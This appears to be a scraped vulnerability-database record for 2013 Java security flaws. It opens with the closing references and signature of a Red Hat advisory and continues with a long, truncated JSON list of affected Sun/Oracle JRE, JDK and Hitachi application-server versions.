https://www.redhat.com/security/data/cve/CVE-2013-0424.html https://www.redhat.com/security/data/cve/CVE-2013-0425.html https://www.redhat.com/security/data/cve/CVE-2013-0426.html https://www.redhat.com/security/data/cve/CVE-2013-0427.html https://www.redhat.com/security/data/cve/CVE-2013-0428.html https://www.redhat.com/security/data/cve/CVE-2013-0429.html https://www.redhat.com/security/data/cve/CVE-2013-0431.html https://www.redhat.com/security/data/cve/CVE-2013-0432.html https://www.redhat.com/security/data/cve/CVE-2013-0433.html https://www.redhat.com/security/data/cve/CVE-2013-0434.html https://www.redhat.com/security/data/cve/CVE-2013-0435.html https://www.redhat.com/security/data/cve/CVE-2013-0440.html https://www.redhat.com/security/data/cve/CVE-2013-0441.html https://www.redhat.com/security/data/cve/CVE-2013-0442.html https://www.redhat.com/security/data/cve/CVE-2013-0443.html https://www.redhat.com/security/data/cve/CVE-2013-0444.html https://www.redhat.com/security/data/cve/CVE-2013-0445.html https://www.redhat.com/security/data/cve/CVE-2013-0450.html https://www.redhat.com/security/data/cve/CVE-2013-1475.html https://www.redhat.com/security/data/cve/CVE-2013-1476.html https://www.redhat.com/security/data/cve/CVE-2013-1478.html https://www.redhat.com/security/data/cve/CVE-2013-1480.html https://access.redhat.com/security/updates/classification/#important http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.5/NEWS
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRFVXMXlSAg2UNWIIRAvzmAJsEIinMVfUD8oFejiNBbKBOxDtgqwCePy0t WzOE5rFNiST5oFX5kr3mRQA= =+39R -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201302-0253", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jre", "scope": "eq", "trust": 1.9, "vendor": "sun", "version": "1.4.2" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-00" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_37" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_6" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_27" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_34" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_28" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_32" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_22" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_12" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_21" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_3" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_30" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_20" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_7" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_24" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_18" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_37" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_5" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_23" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_31" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_15" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_6" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_28" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_16" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_4" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_19" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_35" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_25" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_1" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_10" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_27" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_2" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_23" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_31" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_12" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_14" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_9" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_33" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_11" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_4" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_35" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_1" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_13" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_15" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_10" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_8" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_16" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_29" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.4.2_38" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_19" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_25" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_36" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.4.2_38" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_2" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.4.2_40" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_14" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_9" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_33" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_11" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.4.2_40" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_26" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_34" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_22" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_13" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_17" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_3" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_30" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_8" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_7" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_29" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_5" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_32" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_36" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_26" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_17" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.4.2_18" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "sdk 08", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "sdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 1.4.2 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 09", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "sdk 24", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.4.2 22", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "sdk 1.4.2 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "sdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.4.2 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.4.2 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 24", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "sdk 1.4.2 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-00" }, { "model": "sdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.4.2 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 08", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.4.2 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "sdk 1.4.2 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.4.2 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "sdk 1.4.2 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 1.4.2 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "sdk 1.4.2 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "09-00" }, { "model": "sdk 1.4.2 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 1.4.2 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 1.4.2 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "sdk 09", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.4.2 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "sdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "sdk 1.4.2 37", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.4.2 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 1.4.2 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 1.4.2 22", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.4.2 37", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "sdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "sdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "sdk 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.4.2" }, { "model": "sdk 1.4.2 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "sdk 1.4.2 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.4.2 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "sdk 1.4.2 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server express", "scope": 